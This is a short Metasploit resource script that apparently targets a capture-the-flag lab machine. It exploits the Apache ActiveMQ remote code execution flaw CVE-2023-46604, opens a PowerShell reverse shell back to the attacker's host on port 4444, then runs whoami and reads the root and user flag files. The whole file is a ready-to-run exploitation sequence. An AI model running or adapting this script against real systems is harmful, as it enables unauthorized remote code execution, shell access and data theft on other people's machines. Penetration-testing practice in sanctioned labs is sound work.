use exploit/multi/misc/apache_activemq_rce_cve_2023_46604
set RHOSTS 10.129.230.70
set RPORT 61616
set LHOST 10.10.14.2
set LPORT 4444
set payload cmd/windows/powershell_reverse_tcp
run -j
sleep 8
sessions -i 1 -c "whoami"
sleep 2
sessions -i 1 -c "type C:\Users\Administrator\Desktop\root.txt"
sleep 2
sessions -i 1 -c "type C:\Users\Administrator\Desktop\user.txt"
sleep 2
sessions -i 1 -c "dir C:\Users"
sleep 2
